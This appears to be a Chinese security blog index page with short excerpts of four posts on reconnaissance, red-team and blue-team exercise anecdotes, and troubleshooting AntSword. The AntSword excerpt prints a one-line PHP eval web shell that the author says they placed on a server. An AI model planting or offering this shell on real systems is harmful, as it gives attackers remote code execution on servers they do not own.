常用信息收集基础技巧
一,信息收集 我们可以借助搜索引擎或是各种平台来对于渗透的目标进行信息收集,信息收集可以用于各种方面,比如获取后台账号,找寻后台地址。还可以用其对于文件以及视频,ip的来源去进行一个溯源...
神人TV之惊人的国护蓝队高手和Hae插件斗智斗勇的故事
不知道大家还记不记得今年八月份的这个瓜 本来以为这个事情已经完了,然后比较巧的是我上个月就正好去给他们单位培训正好又遇到他。培训开始没几天我让他去下个Hae插件,项目地址:https://gith...
红队笑传之穿穿部-记一次攻防演练被某部委安全团队拷打全过程【补档】
这周接到上面的通知去给某政府单位进行资产梳理和渗透测试,这个单位的安服非常有实力,曾经成功抵御了某带编号的境外apt组织的攻击并给出溯源报告。一开始领导让我去搞这个项目的时候我是很抵...
关于AntSword终端显示ret=127的解决方案
<?php @eval($_POST['knight']);?>我将此木马放到某服务器,antsword打开终端后发现输入什么命令都显示ret=127 这说明disable_functions生效查看PHPINFO:<?php phpinfo();?>发现...
